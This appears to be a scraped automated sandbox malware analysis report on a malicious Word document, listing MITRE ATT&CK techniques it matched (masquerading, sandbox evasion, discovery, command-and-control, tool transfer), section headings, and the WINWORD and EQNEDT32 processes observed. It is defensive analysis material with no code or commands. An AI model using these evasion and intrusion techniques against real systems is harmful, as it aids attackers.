Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO-21004-1-Ind Expert.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: WINWORD.EXE PID: 2420 Parent PID: 584

General

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2544 Parent PID: 584

General

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2880 Parent PID: 584